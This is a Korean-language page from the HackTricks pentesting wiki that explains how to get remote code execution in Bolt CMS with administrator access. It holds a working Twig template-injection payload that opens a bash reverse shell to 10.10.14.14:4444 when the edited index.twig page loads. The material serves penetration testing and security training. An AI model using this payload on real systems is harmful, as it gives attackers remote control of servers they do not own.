Korean - Ht

HackTricks Afrikaans - Ht Chinese - Ht Español - Ht Français - Ht German - Ht Greek - Ht Hindi - Ht Italian - Ht Japanese - Ht Korean - Ht Polish - Ht Português - Ht Serbian - Ht Swahili - Ht Turkish - Ht Ukranian - Ht

HackTricks Training Twitter Linkedin Sponsor

HackTricks Training Twitter Linkedin Sponsor

👾Welcome!
🤩Generic Methodologies & Resources
🐧Linux Hardening
🍏MacOS Hardening
🪟Windows Hardening
📱Mobile Pentesting
👽Network Services Pentesting
🕸️Pentesting Web
⛈️Cloud Security
😎Hardware/Physical Access
🎯Binary Exploitation
🔩Reversing
🔮Crypto & Stego
🦂C2
✍️TODO

Powered by GitBook

On this page

Was this helpful?

Bolt CMS

PreviousArtifactory Hacking guide NextBuckets

Last updated 4 months ago

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

구독 계획 확인하기!
**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 팁을 공유하세요.

RCE

관리자로 로그인한 후 (/bot으로 이동하여 로그인 프롬프트에 접근), Bolt CMS에서 RCE를 얻을 수 있습니다:

Configuration -> View Configuration -> Main Configuration을 선택하거나 URL 경로 /bolt/file-edit/config?file=/bolt/config.yaml로 이동합니다.
테마의 값을 확인합니다.

File management -> View & edit templates를 선택합니다.
이전 단계에서 찾은 테마 기본값(base-2021인 경우)을 선택하고 index.twig를 선택합니다.
제 경우에는 URL 경로 /bolt/file-edit/themes?file=/base-2021/index.twig에 있습니다.
템플릿 주입 (Twig)를 통해 이 파일에 페이로드를 설정합니다, 예: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
그리고 변경 사항을 저장합니다.

Maintenance -> Clear the cache에서 캐시를 지웁니다.
일반 사용자로 다시 페이지에 접근하면 페이로드가 실행되어야 합니다.

HackTricks 지원하기

구독 계획 확인하기!
**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 팁을 공유하세요.

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)